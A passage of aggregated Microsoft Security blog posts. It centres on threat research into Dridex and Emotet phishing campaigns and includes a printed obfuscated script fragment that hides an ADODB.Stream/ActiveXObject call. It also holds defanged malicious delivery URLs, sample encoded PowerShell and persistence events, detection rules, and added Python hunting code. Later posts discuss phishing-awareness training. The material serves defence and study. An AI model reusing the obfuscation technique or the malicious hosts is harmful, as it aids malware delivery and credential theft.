When opened, the Excel document installed one of a series of custom Dridex executables downloaded from the attacker C2 sites. Like most variants in this malware family, the custom Dridex executables incorporated code loops, time delays, and environment detection mechanisms that evaded numerous public and enterprise sandboxes.

Dridex is known for its capability to perform credential theft and establish connectivity to attacker infrastructure. In this instance, the same Dridex payload was circulated daily using varying lures, often repeatedly to the same organizations to ensure execution on target networks.

During the longer and more stable Excel Dridex campaigns in June and July, a Dridex variant was also distributed in much smaller quantities utilizing Word documents over a one-day period, perhaps testing new evasion techniques. These Word documents, while still delivering Dridex, improved existing obfuscation methods using a unique combination of VBA stomping and replacing macros and function calls with arbitrary text. In a few samples of these documents, we found text from Shakespearean prose.

<ms:script>
// reversed at run time, the character array spells "adodb.stream"
var farewell_and_moon = ["m","a","e","r","t","s",".","b","d","o","d","a"].reverse().join("")
a_painted_word(120888)
// wrapper so that ActiveXObject never appears next to its argument
function as_thy_face(takes_from_hamlet)
{return new ActiveXObject(takes_from_hamlet)}
</ms:script>

While Microsoft researchers didn’t observe this portion of the campaign moving into the human-operated phase—targets did not open the attachment—this campaign was likely to introduce tools like PowerShell Empire or Cobalt Strike to steal credentials, move laterally, and deploy ransomware.

Emotet, Dridex, and the RandomU infrastructure (September and beyond)

Despite an errant handful of deliveries distributing Dofoil (also known as SmokeLoader) and other malware, the vast majority of the remaining deliveries through StrangeU have been Dridex campaigns that recurred every few weeks for a handful of days at a time. These campaigns started on September 7, when RandomU and StrangeU were notably used in a single campaign, after which StrangeU began to see less utilization.

These Dridex campaigns utilized an Emotet loader and initial infrastructure for hosting, allowing the attackers to conduct a highly modular email campaign that delivered multiple distinct links to compromised domains. These domains employed heavy sandbox evasion and are connected by a series of PHP file names drawn from a small set of options: zxlbw.php, yymclv.php, zpsxxla.php, or app.php. As the campaigns continued, the PHP file names were dynamically generated, adding other variants, including vary.php, invoice.php, share.php, and many others. Some examples are below.

  • hxxps://molinolafama[.]com[.]mx/app[.]php
  • hxxps://meetingmins[.]com/app[.]php
  • hxxps://contrastmktg[.]com/yymclv[.]php
  • hxxps://idklearningcentre[.]com[.]ng/zxlbw[.]php
  • hxxps://idklearningcentre[.]com[.]ng/zpsxxla[.]php
  • hxxps://idklearningcentre[.]com[.]ng/yymclv[.]php
  • hxxps://hsa[.]ht/yymclv[.]php
  • hxxps://hsa[.]ht/zpsxxla[.]php
  • hxxps://hsa[.]ht/zxlbw[.]php
  • hxxps://contrastmktg[.]com/yymclv[.]php
  • hxxps://track[.]topad[.]co[.]uk/zpsxxla[.]php
  • hxxps://seoemail[.]com[.]au/zxlbw[.]php
  • hxxps://bred[.]fr-authentification-source-no[.]inaslimitada[.]com/zpsxxla[.]php
  • hxxp://www[.]gbrecords[.]london/zpsxxla[.]php
  • hxxp://autoblogsite[.]com/zpsxxla[.]php
  • hxxps://thecrossfithandbook[.]com/zpsxxla[.]php
  • hxxps://mail[.]168vitheyrealestate[.]com/zpsxxla[.]php
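As an added example (not code from the post), the Python below turns the defanged URLs above into a hunting rule: it refangs the IoCs, groups hosts by the PHP script name they served, and then scans constructed proxy-log lines. The rare script names are treated as high-confidence on their own, while app.php, too generic to hunt on alone, is only flagged on hosts already seen serving this campaign. The URL list is a subset of the one in the post; the log lines and their format are constructed.

```python
from collections import defaultdict
from urllib.parse import urlsplit

# Delivery URLs quoted (defanged) in the post; a subset is enough to show the pivot.
DEFANGED_URLS = [
    "hxxps://molinolafama[.]com[.]mx/app[.]php",
    "hxxps://meetingmins[.]com/app[.]php",
    "hxxps://contrastmktg[.]com/yymclv[.]php",
    "hxxps://idklearningcentre[.]com[.]ng/zxlbw[.]php",
    "hxxps://idklearningcentre[.]com[.]ng/zpsxxla[.]php",
    "hxxps://idklearningcentre[.]com[.]ng/yymclv[.]php",
    "hxxps://hsa[.]ht/yymclv[.]php",
    "hxxps://hsa[.]ht/zpsxxla[.]php",
    "hxxps://hsa[.]ht/zxlbw[.]php",
    "hxxp://autoblogsite[.]com/zpsxxla[.]php",
]
# The rare script names are high-confidence on their own; app.php is too
# generic and only counts on a host already seen serving this campaign.
RARE_ENDPOINTS = {"zxlbw.php", "yymclv.php", "zpsxxla.php"}
GENERIC_ENDPOINTS = {"app.php"}

def refang(ioc):
    """Undo the hxxp / [.] defanging used in the post."""
    return ioc.replace("hxxp", "http").replace("[.]", ".").replace("[:]", ":")

def endpoint_of(url):
    """Last path component, lower-cased, e.g. 'zxlbw.php'."""
    return urlsplit(url).path.rsplit("/", 1)[-1].lower()

def endpoints_per_host(defanged):
    """Map each host to the sorted set of campaign script names it served."""
    per_host = defaultdict(set)
    for ioc in defanged:
        url = refang(ioc)
        name = endpoint_of(url)
        if name in RARE_ENDPOINTS | GENERIC_ENDPOINTS:
            per_host[urlsplit(url).hostname].add(name)
    return {host: sorted(names) for host, names in per_host.items()}

def hosts_serving_multiple(defanged):
    """Hosts that exposed two or more of the script names: the strongest
    evidence that the same PHP kit was dropped on each compromised site."""
    return {h: n for h, n in endpoints_per_host(defanged).items() if len(n) >= 2}

# Constructed proxy-log lines: timestamp, client, method, URL, status.
PROXY_LOG = """\
2020-09-08T10:01:02Z 10.0.0.5 GET https://hsa.ht/zxlbw.php 302
2020-09-08T10:01:09Z 10.0.0.5 GET https://www.example-news.com/app.php 200
2020-09-08T10:02:30Z 10.0.0.7 GET https://meetingmins.com/app.php 200
2020-09-08T10:05:00Z 10.0.0.9 GET https://intranet.example.com/share.php 200
"""

def hunt(log_text, defanged=DEFANGED_URLS):
    """Flag proxy requests that match the campaign's URL pattern."""
    known_hosts = set(endpoints_per_host(defanged))
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        url = fields[3]
        host, name = urlsplit(url).hostname, endpoint_of(url)
        if name in RARE_ENDPOINTS:
            hits.append({"host": host, "endpoint": name, "reason": "rare campaign script name"})
        elif name in GENERIC_ENDPOINTS and host in known_hosts:
            hits.append({"host": host, "endpoint": name, "reason": "generic name on known campaign host"})
    return hits

if __name__ == "__main__":
    print(hosts_serving_multiple(DEFANGED_URLS))
    for hit in hunt(PROXY_LOG):
        print(hit)
```

Note that share.php on an internal host is deliberately not a hit: the later, dynamically generated names the post mentions (vary.php, invoice.php, share.php) are too common to hunt on without the host context.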

In this campaign, sandboxes were frequently redirected to unrelated sites like chemical manufacturers or medical suppliers, while users received an Emotet downloader within a Word document, which once again used macros to facilitate malicious activities.

Screenshot of malicious document

Figure 5. Screenshot of the malicious document used to deliver Dridex

The malicious macro utilized WMI to run a series of standard PowerShell commands. First, it downloaded the executable payload itself by contacting a series of C2 domains associated with Emotet campaigns since July. Afterward, additional encoded PowerShell commands were used in a similar fashion to download a .zip file that contained a Dridex DLL. Additional commands also reached out to a variety of Emotet infrastructure hosted on compromised WordPress administrative pages, even after the Dridex payload had already been downloaded. Dridex then modified Run keys to automatically start the Dridex executable, which was renamed to riched20.exe, on subsequent logons.
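The process chains in this section and in the Trickbot section above (Word launching cmd.exe “/c pause”, rundll32.exe spawning wermgr.exe, wermgr.exe injecting into svchost.exe, WMI-launched encoded PowerShell, and a Run key pointing at riched20.exe) can be expressed as parent/child detection rules over endpoint telemetry. The Python below is an added example, not the post’s or Microsoft Defender’s own detection logic; the Sysmon-style event records, process IDs, paths and the base64 blob are constructed placeholders.

```python
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
ENCODED_PS = re.compile(r"(^|\s)-e(nc|ncodedcommand)?\s")

# Constructed Sysmon-style events covering both chains described in the post:
# Word -> cmd.exe "/c pause" -> rundll32.exe -> wermgr.exe -> injection into
# svchost.exe (Trickbot), then WMI-launched encoded PowerShell writing a Run
# key for riched20.exe (the Emotet-delivered Dridex stage). Paths, PIDs and
# the base64 blob (which decodes to "ABC") are placeholders.
EVENTS = [
    {"type": "process", "pid": 100, "ppid": 1, "image": r"C:\Program Files\Microsoft Office\WINWORD.EXE", "cmdline": "WINWORD.EXE /n invoice.doc"},
    {"type": "process", "pid": 101, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c pause"},
    {"type": "process", "pid": 102, "ppid": 101, "image": r"C:\Windows\System32\rundll32.exe", "cmdline": r"rundll32.exe C:\Users\Public\stage.dll,Start"},
    {"type": "process", "pid": 103, "ppid": 102, "image": r"C:\Windows\System32\wermgr.exe", "cmdline": "wermgr.exe"},
    {"type": "inject", "source_pid": 103, "target_image": r"C:\Windows\System32\svchost.exe"},
    {"type": "process", "pid": 200, "ppid": 50, "image": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "cmdline": "WmiPrvSE.exe"},
    {"type": "process", "pid": 201, "ppid": 200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "cmdline": "powershell.exe -nop -w hidden -enc QQBCAEMA"},
    {"type": "registry", "pid": 201, "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Update", "data": r"C:\Users\user\AppData\Roaming\riched20.exe"},
    {"type": "process", "pid": 300, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
]

def basename(path):
    """Lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def detect(events):
    """Run the parent/child and persistence rules over an event stream and
    return (rule_name, pid) findings in event order."""
    procs = {e["pid"]: e for e in events if e["type"] == "process"}

    def parent_of(e):
        parent = procs.get(e["ppid"])
        return basename(parent["image"]) if parent else ""

    findings = []
    for e in events:
        if e["type"] == "process":
            child, parent, cmd = basename(e["image"]), parent_of(e), e["cmdline"].lower()
            if parent in OFFICE_APPS and child == "cmd.exe" and "/c pause" in cmd:
                findings.append(("office_cmd_pause", e["pid"]))
            elif parent in OFFICE_APPS and child in SHELLS:
                findings.append(("office_spawns_shell", e["pid"]))
            if parent == "rundll32.exe" and child == "wermgr.exe":
                findings.append(("rundll32_spawns_wermgr", e["pid"]))
            if parent == "wmiprvse.exe" and child == "powershell.exe" and ENCODED_PS.search(cmd):
                findings.append(("wmi_encoded_powershell", e["pid"]))
        elif e["type"] == "inject":  # CreateRemoteThread-style event
            source = procs.get(e["source_pid"])
            if source and basename(source["image"]) == "wermgr.exe" and basename(e["target_image"]) == "svchost.exe":
                findings.append(("wermgr_injects_svchost", e["source_pid"]))
        elif e["type"] == "registry":
            key, data = e["key"].lower(), e["data"].lower()
            if "\\currentversion\\run\\" in key and basename(data) == "riched20.exe" and not data.startswith("c:\\windows\\"):
                findings.append(("run_key_riched20_user_path", e["pid"]))
    return findings

def ancestry(events, pid):
    """Walk the process tree upward for triage, e.g.
    'wermgr.exe <- rundll32.exe <- cmd.exe <- winword.exe'."""
    procs = {e["pid"]: e for e in events if e["type"] == "process"}
    names = []
    while pid in procs:
        names.append(basename(procs[pid]["image"]))
        pid = procs[pid]["ppid"]
    return " <- ".join(names)

if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule:28} pid={pid}  chain: {ancestry(EVENTS, pid)}")
```

Two of the rules deliberately key on specifics from the post (wermgr.exe, riched20.exe); in a real ruleset the generic forms (an Office app spawning a shell, WMI spawning encoded PowerShell, any Run key pointing into a user-writable directory) carry the detection, and the specific names serve as confirmation.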

We also observed simultaneous connections to associated Dridex and Emotet infrastructure. These connections were largely unencrypted and occurred over a variety of ports and services, including ports 4664 and 9443. At this point the malware had firm presence on the machine, enabling attackers to perform human-operated activity at a later date.

In the past, reports have confirmed Dridex being delivered via leased Emotet infrastructure. There have also been many IP and payload-based associations. This research adds to that body of work and confirms additional associations via namespace, as well as correlation of email lure, metadata, and sender. This iteration of the campaign repeated through October to December largely unchanged, with nearly identical mails.

Defending organizations against malware campaigns

As attacks continue to grow in modularity, the tactics that attackers use to deliver phishing email, gain initial access on systems, and move laterally will continuously become more varied. This research shows that despite these disparities and the increased resiliency attackers have built, the core tactics and tools that they use are still limited in scope, relying repeatedly on familiar malicious macros, lures, and sending tactics.

Sweeping research into massive attacker infrastructures, as well as our real-time monitoring of malware campaigns and attacker activity, directly inform Microsoft security solutions, allowing us to build or improve protections that block malware campaigns and other email threats, both current and future, as well as provide enterprises with the tools for investigating and responding to email campaigns in real-time.

Microsoft delivers these capabilities through Microsoft Defender for Office 365. Features like Safe Attachments and Safe Links ensure real-time, dynamic protection against email campaigns no matter the lure or evasion tactic. These features use a combination of detonation, automated analysis, and machine learning to detect new and unknown threats. Meanwhile, the Campaign view shows the complete picture of email campaigns as they happen, including timelines, sending patterns, impact to the organization, and details like IP addresses, senders, and URLs. These insights into email threats empower security operations teams to respond to attacks, perform additional hunting, and fix configuration issues.

Armed with an advanced solution like Microsoft Defender for Office 365 and the rest of the technologies in the broader Microsoft 365 Defender solution, enterprises can further increase resilience against threats by following these recommendations:

  • Educate end users about protecting personal and business information in social media, filtering unsolicited communication, identifying lures in spear-phishing email, and reporting of reconnaissance attempts and other suspicious activity.
  • Configure Office 365 email filtering settings to ensure blocking of phishing & spoofed emails, spam, and emails with malware. Set Office 365 to recheck links on click and delete sent mail to benefit from newly acquired threat intelligence.
  • Disallow macros or allow only macros from trusted locations. See the latest security baselines for Office and Office 365.
  • Turn on AMSI for Office VBA.
  • Check perimeter firewall and proxy to restrict servers from making arbitrary connections to the internet to browse or download files. Turn on network protection to block connections to malicious domains and IP addresses. Such restrictions help inhibit malware downloads and command-and-control activity.

Turning on attack surface reduction rules, including rules that can block advanced macro activity, executable content, process creation, and process injection initiated by Office applications, also significantly improves defenses. The following rules are especially useful in blocking the techniques observed in campaigns using the StrangeU and RandomU infrastructure:

Microsoft 365 customers can also use the advanced hunting capabilities in Microsoft 365 Defender, which integrates signals from Microsoft Defender for Office 365 and other solutions, to locate activities and artifacts related to the infrastructure and campaigns discussed in this blog. These queries can be used with advanced hunting in Microsoft 365 security center, but the same regex pattern can be used on other security tools to identify or block emails.

This query searches for emails sent from StrangeU email addresses.

EmailEvents   
| where SenderMailFromDomain matches regex @"^(?:eraust|ereply|reply|ereceived|received|reaust|esend|inv|send|emailboost|eontaysstrange|eprop|frost|eont|servicply).*(strange|stange|emailboost).*\.us$"   
or SenderFromDomain matches regex @"^(?:eraust|ereply|reply|ereceived|received|reaust|esend|inv|send|emailboost|eontaysstrange|eprop|frost|eont|servicply).*(strange|stange|emailboost).*\.us$"
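The text notes that the same regex can be reused outside advanced hunting. As an added example (not from the original post), here is the pattern copied verbatim and applied in Python to constructed email events whose field names mirror the EmailEvents columns the query uses; the events and the non-StrangeU domains are placeholders I made up. It also shows a caveat worth knowing before treating the pattern as a blocklist: some domains the post itself names as StrangeU infrastructure (for example emailboostgedigital[.]us and invdeliverynow[.]us) do not match it, because the pattern requires a second keyword after the prefix.

```python
import re
from typing import Dict, List, Tuple

# Pattern copied verbatim from the KQL query above.
STRANGEU_PATTERN = re.compile(
    r"^(?:eraust|ereply|reply|ereceived|received|reaust|esend|inv|send"
    r"|emailboost|eontaysstrange|eprop|frost|eont|servicply)"
    r".*(strange|stange|emailboost).*\.us$"
)


def is_strangeu_domain(domain: str) -> bool:
    """True when a sender domain matches the published StrangeU pattern.
    KQL 'matches regex' is case-sensitive, so normalise to lowercase first;
    that way a mixed-case header value cannot slip past."""
    return STRANGEU_PATTERN.search(domain.strip().lower()) is not None


def flag_events(events: List[Dict]) -> List[Tuple[int, str, str]]:
    """Mirror the query's OR: flag on the envelope MAIL FROM domain or on the
    header From domain, whichever hits first. Returns (index, field, domain)."""
    hits: List[Tuple[int, str, str]] = []
    for i, ev in enumerate(events):
        for field in ("SenderMailFromDomain", "SenderFromDomain"):
            domain = ev.get(field, "")
            if is_strangeu_domain(domain):
                hits.append((i, field, domain.lower()))
                break
    return hits


# Constructed events (NOT real mail logs). Domains marked "named in post" are
# ones the original write-up lists as StrangeU; the rest are placeholders.
SAMPLE_EVENTS: List[Dict] = [
    {"NetworkMessageId": "m1",
     "SenderMailFromDomain": "ereplysstrangeasia.us",      # named in post
     "SenderFromDomain": "ereplysstrangeasia.us"},
    {"NetworkMessageId": "m2",
     "SenderMailFromDomain": "ereceivedsstrangevip.us",    # named in post
     "SenderFromDomain": "partner.example"},               # header From dressed up to look benign
    {"NetworkMessageId": "m3",
     "SenderMailFromDomain": "emailboostgedigital.us",     # named in post, but no second keyword
     "SenderFromDomain": "emailboostgedigital.us"},
    {"NetworkMessageId": "m4",
     "SenderMailFromDomain": "invdeliverynow.us",          # named in post, but no keyword at all
     "SenderFromDomain": "invdeliverynow.us"},
    {"NetworkMessageId": "m5",
     "SenderMailFromDomain": "example.com",
     "SenderFromDomain": "example.com"},
]

if __name__ == "__main__":
    for idx, field, dom in flag_events(SAMPLE_EVENTS):
        print(f"{SAMPLE_EVENTS[idx]['NetworkMessageId']}: {field}={dom} matches the StrangeU pattern")
```

Only m1 and m2 are flagged; m2 is caught on the envelope domain even though its header From looks ordinary, which is why the query checks both columns.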

Learn how you can stop attacks through automated, cross-domain security and built-in AI with Microsoft Defender 365.

Indicators of compromise

StrangeU domains

RandomU domains

The post What tracking an attacker email infrastructure tells us about persistent cybercriminal operations appeared first on Microsoft Security.

Terranova Security Gone Phishing Tournament reveals continued weak spot in cybersecurity

December 16th, 2020

The Terranova Security annual Gone Phishing Tournament™ wrapped up in October 2020, spanning 98 countries and industries including healthcare, consumer goods, transport, energy, IT, finance, education, manufacturing, and more. Using templates that Microsoft Security created from actual phishing attacks, Terranova Security Awareness Training draws on principles of behavioral science to create content that changes user behavior. True to our mission, this year’s results reveal a lot about the state of cybersecurity at the human level—your organization’s first line of defense.

Tournament results

Terranova Security’s Gone Phishing Tournament is a free, annual cybersecurity event that takes place in October to coincide with National Cybersecurity Awareness Month. The Tournament tests real-world responses using a phishing email modeled on actual threats provided by Attack Simulation Training in Microsoft Defender for Office 365 (Office 365 Advanced Threat Protection). Click rates are segmented by industry, organization size, region, web browser, and operating system.

Using a template created from real phishing attacks, translated into 11 languages across 98 countries, the 2020 Gone Phishing Tournament revealed that organizations are taking phishing threats seriously, but with mixed results.

“There’s increasing crossover between our personal and work activities online. That’s why cybersecurity education and training needs to be an ongoing commitment.”—Vasu Jakkal, CVP, Security, Compliance and Identity Marketing, Microsoft

Figure 1: Password submission by industry

The average password submission rate across industries was 13.4 percent, with education employees taking the bait least often at just 7.9 percent. The highest password submission rate was among public sector employees at 20.7 percent.

Figure 2: Click and password submission rates by the size of the organization

The tournament results also showed there was not a great deal of variation when comparing organizations of varied sizes. For example, there was only a 9.2 percent difference in the number of people who clicked the phishing link and submitted passwords at organizations of fewer than 100 people, compared with those consisting of more than 3,000 employees. The results show that phishing attacks are not just a threat for smaller organizations with less sophisticated cybersecurity training—large organizations were even more vulnerable.

Ongoing attacks

In the new world of remote work, your people are your perimeter. Phishing provides hackers with a low-cost, low-risk form of social engineering with a potentially big payoff in the form of stolen passwords, leaked credentials, and access to sensitive data and intellectual property. Throughout 2020, opportunistic cybercriminals have been preying on distracted, overstressed remote workers by introducing COVID-19-themed phishing lures. The World Health Organization (WHO) has referred to the ongoing COVID-19 themed phishing attacks as an “infodemic.” By the summer of 2020, the Federal Trade Commission (FTC) had already recorded over 59,000 coronavirus or stimulus-related complaints resulting in over $74 million in losses.

The National Cyber Security Alliance (NCSA) is pushing back against the rise in cybercrime by building strong public and private partnerships that empower users to stay secure online.

“The Phishing Benchmark Global Report reinforces the need for the current work being done by organizations like Microsoft, Terranova Security, and the National Cyber Security Alliance. Real-world phishing simulations and engaging security awareness training help make organizations, employees, and everyday citizens aware of the growing risk of social engineering and phishing emails. We will continue working in partnership with industry and government to empower the global community towards becoming one that is more cyber aware.”—Kelvin Coleman, Executive Director of NCSA

Not all security awareness training is alike

To defend against increasingly sophisticated cyber threats, organizations need real-world training delivered as a comprehensive internal campaign. Terranova Security Awareness Training includes gamification and interactive sessions designed to engage users, and its content can be localized to different geographies around the world.

Attack Simulation Training in Microsoft Defender for Office 365, delivered in partnership with Terranova Security, integrates simulations, training, and reporting. Terranova Security is excited to partner with Microsoft to deliver this differentiated, industry-leading solution, allowing our customers to detect, prioritize, and remediate phishing risk across their organizations. With Attack simulation training, customers can:

  • Simulate real threats: Detect vulnerabilities with real lures and templates—automatically or manually send employees the phishing emails attackers have used against your organization. Then, reach out to users who fall for a phishing lure with personalized training content.
  • Remediate intelligently: Quantify social engineering risks across employees and threat vectors to prioritize remedial training. Track your organization’s progress against a baseline and measure the behavioral impacts. Using user susceptibility metrics triggers automated repeat offender simulations and training for people who need extra attention.
  • Improve security posture: Reinforce your human security system with targeted training designed to change employee behavior. Training can be customized and localized, including simulations tailored to your employees’ contexts—region, industry, function—with granular conditionality on harvesting. Cater to diverse learning styles with interactive nano-learning and micro-learning content.

If there is a common thread to be found in this year’s Gone Phishing Tournament results, it is that organizations of every size need to make integrated attack simulation and training a cornerstone of their cybersecurity program. Cybercriminals do not take days off, and neither should your simulation and training program.

To learn more about Microsoft Security solutions visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Terranova Security Gone Phishing Tournament reveals continued weak spot in cybersecurity appeared first on Microsoft Security.

Why integrated phishing-attack training is reshaping cybersecurity—Microsoft Security

October 5th, 2020

Phishing is still one of the most significant risk vectors facing enterprises today. Innovative email security technology like Microsoft Defender for Office 365 stops a majority of phishing attacks before they hit user inboxes, but no technology in the world can prevent 100 percent of phishing attacks from hitting user inboxes. At that point in time, your employees become your defenders. They must be trained to recognize and report phishing attacks. But not all training is equally proficient.

This blog examines the current state of security awareness training, including how you can create an intelligent solution to detect, analyze, and remediate phishing risk. You’ll also learn about an upcoming event to help you get data-driven insights to compare your current phishing risk level against your peers.

A new reality for cybersecurity

The Chief Information Security Officer (CISO) at a modern enterprise must contend with a myriad of threats. The hybrid mix of legacy on-premises systems and cloud solutions, along with the proliferation of employee devices and shadow IT, means your security team needs a new and comprehensive view of phishing risk across the organization. Self-reported training completion metrics don’t provide insights into behavior changes or risk reduction, leading CISOs to distrust these metrics. Improvement in employee behavior becomes difficult to measure, leaving them anxious about whether employee behavior has improved at all.

Many information workers view security awareness training as a tedious interruption that detracts from productivity. Often when an employee is compromised during a simulated attack, they find the ensuing training to be punitive and navigate away from the training like nothing happened. Worse, simulations are often out-of-context and don’t make sense for the employee’s industry or function.

People-centric protection

Making secure behaviors a part of people’s daily habits requires a regular program of targeted education combined with realistic simulations. That means regular breach and attack simulations against endpoints, networks, and cloud security controls. Microsoft Defender for Office 365 now features simulations to help you detect and remediate phishing risks across your organization. Attack Simulation Training in Microsoft Defender for Office 365, delivered in partnership with Terranova Security, helps you gain visibility into organizational risk, establish a baseline against predicted compromise rates, and prioritize remediations. To learn more about this capability, watch the product launch at Microsoft Ignite 2020.

Terranova Security employs a pedagogical approach to cybersecurity, including gamification and interactive sessions designed to engage users’ interest. The simulations are localized for employees around the world and follow the highest web content accessibility guidelines (WCAG) 2.1. You will be able to measure employee behavior changes and deploy an integrated, automated security awareness program built on three pillars of protection:

  • Simulate real threats: Detect vulnerabilities by using real lures (actual phishing emails) and templates, training employees on the most up-to-date threats. Administrators can automate and customize simulations, including payload attachment, user targeting, scheduling, and cleanup. Azure Active Directory (AAD) groups automate user importing, and the vast library of training content enables personalized training based on a user’s vulnerability score or simulation performance.
  • Remediate intelligently: Quantify your social engineering risk across employees and threat vectors to accurately target remedial training. Measure the behavioral impact and track your organization’s progress against a baseline compromise rate. Set up automated repeat offender simulations with the user susceptibility metric and add context by correlating behavior with a susceptibility score.
  • Improve your security posture: Reinforce your human security system with hyper-targeted training designed to change employee behavior. Attack Simulation Training in Microsoft Defender for Office 365 provides nano learnings and micro learnings to cater to diverse learning styles and reinforce awareness.

Check your threat level

Coinciding with National Cyber Security Awareness Month (NCSAM), Terranova will release the results of the Terranova Security Gone Phishing Tournament™ at the end of October. This popular event helps security leaders get an up-to-the-minute picture of their organization’s phishing click rate. Terranova launched this campaign back in August and supplied a free phishing simulation to its applicants, enabling them to benchmark themselves against their peers with accurate click-rate data for comparison.

Co-sponsored by Microsoft, the Terranova Security Gone Phishing Tournament uses an email template from Attack simulation training—a new capability of Office 365 ATP releasing later this year—that acts as an intelligent social engineering risk management tool using context-aware simulations and targeted training.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Why integrated phishing-attack training is reshaping cybersecurity—Microsoft Security appeared first on Microsoft Security.

Microsoft Digital Defense Report 2020: Cyber Threat Sophistication on the Rise

September 29th, 2020

Today, Microsoft is releasing a new annual report, called the Digital Defense Report, covering cybersecurity trends from the past year. This report makes it clear that threat actors have rapidly increased in sophistication over the past year, using techniques that make them harder to spot and that threaten even the savviest targets. For example, nation-state actors are engaging in new reconnaissance techniques that increase their chances of compromising high-value targets, criminal groups targeting businesses have moved their infrastructure to the cloud to hide among legitimate services, and attackers have developed new ways to scour the internet for systems vulnerable to ransomware.

In addition to attacks becoming more sophisticated, threat actors are showing clear preferences for certain techniques, with notable shifts towards credential harvesting and ransomware, as well as an increasing focus on Internet of Things (IoT) devices. Among the most significant statistics on these trends:

  • In 2019 we blocked over 13 billion malicious and suspicious mails, out of which more than 1 billion were URLs set up for the explicit purpose of launching a phishing credential attack.
  • Ransomware is the most common reason behind our incident response engagements from October 2019 through July 2020.
  • The most common attack techniques used by nation-state actors in the past year are reconnaissance, credential harvesting, malware, and Virtual Private Network (VPN) exploits.
  • IoT threats are constantly expanding and evolving. The first half of 2020 saw an approximate 35% increase in total attack volume compared to the second half of 2019.

Given the leap in attack sophistication in the past year, it is more important than ever that we take steps to establish new rules of the road for cyberspace; that all organizations, whether government agencies or businesses, invest in people and technology to help stop attacks; and that people focus on the basics, including regular application of security updates, comprehensive backup policies, and, especially, enabling multi-factor authentication (MFA). Our data shows that enabling MFA would alone have prevented the vast majority of successful attacks.

To read the full blog and download the Digital Defense Report visit the Microsoft On-the-issues Blog.

To learn more about Microsoft Security solutions visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Microsoft Digital Defense Report 2020: Cyber Threat Sophistication on the Rise appeared first on Microsoft Security.

Microsoft Security: 6 tips for enabling people-centric cybersecurity with security training

September 24th, 2020

Everyone knows about phishing scams, and most of us think we’re too smart to take the bait. Our confidence often reaches superhero levels when we’re logged onto a company network. As Chief Security Advisor for Microsoft, and previously at telco Swisscom, it’s my business to understand how well employees adapt security training into their daily routines. Years of experience have taught me there are commonalities in human behavior that cut across all levels of an organization. Above all, people want to trust the company they work for and the communications they receive. It’s our task to help them understand that yes, their employer is looking out for them, but they also need to be vigilant to protect themselves and their company’s private data.

Tip #1: Make it fun. That means creating training modules that people will actually want to watch. Think of your favorite TV shows. There’s a reason you want to binge every episode. You care about the characters, or you’re at least interested in how their dilemmas work out. A good example is the Fox TV show 24; every episode was one hour in an unfolding storyline with high stakes. Your training program doesn’t need life-or-death consequences, but it should give people a reason to watch beyond just checking a box for compliance.

Tip #2: Make it easy. Your end user is your customer, so you need their buy-in. When investigating new security solutions, I ask: “Could you explain how this works to my mother in thirty minutes or less?” If not, it’s probably not a user-friendly solution. Asking people to create a password with 20 characters consisting of random symbols, cases, and numbers (that they shouldn’t write down) is not easy. For a better option, try passwordless authentication options for Azure Active Directory. If your organization has Microsoft Defender for Office 365 Plan 2, which includes Threat Investigation and Response capabilities, you can employ Attack Simulator in the Security & Compliance Center to run realistic scenarios. These simulated attacks can help you easily identify vulnerable users before a real attacker comes knocking.

Tip #3: Focus on your highest risk. Nearly one in three security breaches starts with a phishing attack, costing the affected organization an average of USD1.4 million. Even after security training, employees still click on phishing links at an average rate of 20 to 30 percent. With the rise in people working from home, new forms, such as consent phishing, have cropped up to take advantage of new vulnerabilities. Direct your resources to where the people in your organization can see the risk is real, and you’ll generate positive engagement.

Tip #4: Be transparent about breaches. No organization can claim 100 percent invulnerability. Let people know they are the first line of defense. Communicating with staff when a successful attack occurs will help them remain alert. It’s okay to provide examples as long as you don’t reveal so much information that it’s obvious who clicked on that fake Zoom invitation. Be careful not to treat employees like children. They need to own their own actions, but shaming won’t make your organization safer.

Tip #5: Avoid a compliance-only mindset. Yes, that once-a-year cybersecurity training your people dutifully click through meets the organizational requirement. But gaining employee buy-in means doing more than just checking the box. Schedule a refresher course after a breach, even if the victim happens to be another company. Creating a security program that’s fun and engaging will probably cost more, but ask yourself how high the costs from downtime and lost productivity from a major breach would run. Better to invest those funds in protection upfront.

Tip #6: Communicate and educate continuously. Make security news part of your normal staff communications. Talk to your people about the headline-making hacks that target large corporations and government agencies, as well as the smaller identity theft and payment-app scams we all contend with. Talk about supply chain security and the dangers of using unauthorized devices and shadow IT. Cybersecurity threats can feel overwhelming and scary. Communication helps demystify those threats and makes employees feel empowered to protect themselves and their organizations.


How can Microsoft Threat Protection help reduce the risk from phishing?

August 26th, 2020

Microsoft Threat Protection can help you reduce the cost of phishing

The true cost of a successful phishing campaign may be higher than you think. Although phishing defenses and user education have become common in many organizations, employees still fall prey to these attacks. This is a problem because phishing is often leveraged as the first step in other cyberattack methods. As a result, its economic impact remains hidden. Understanding how these attacks work is key to mitigating your risk.

One reason phishing is so insidious is that attackers continuously evolve their methods. In this blog, I’ve described why you need to take phishing seriously and how different phishing methods work. You’ll also find links to Microsoft Threat Protection solutions that can help you reduce your risk.

Nearly 1 in 3 attacks involve phishing

